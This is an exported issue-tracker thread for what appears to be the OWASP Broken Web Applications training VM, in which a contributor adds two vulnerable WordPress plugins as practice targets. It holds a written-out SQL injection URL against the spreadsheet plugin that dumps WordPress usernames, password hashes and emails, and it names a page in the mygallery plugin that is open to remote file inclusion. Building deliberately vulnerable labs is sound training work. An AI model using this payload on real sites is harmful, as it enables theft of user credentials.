Wordpress Plugins

[GoogleCodeExporter]

To spice things up a bit, I added two plugins to WordPress (mygallery, 
spreadsheet). Also made a post on the front page about it.  Most people are 
running atleast one plug-in, so I thought this gave a more 'real world' 
perspective.  Also, both plug-ins suffer from vulenrabilities.

http://www.exploit-db.com/exploits/3814/
http://www.exploit-db.com/exploits/5486/

exploit: 
http://owaspbwa/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+
union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_use
rs--

the RFI will take some more work, but the vulnerable page is: 
http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrow
ser.php

You can remove the .zip plugin files from /var/www/wordpress/wp-content/plugins 
to save some space. 

If this gets added, let me know and i'll update vuln_list.html!

Original issue reported on code.google.com by MichaelTCyr@gmail.com on 20 Apr 2011 at 4:04

Attachments:

• wordpress_with_plugins.tar.gz

[GoogleCodeExporter]

uploaded everything, and tested it.
fixed as of revision 161.
added items to vuln_list.html as of revision 162

Original comment by MichaelTCyr@gmail.com on 20 Apr 2011 at 4:24

• Changed state: Fixed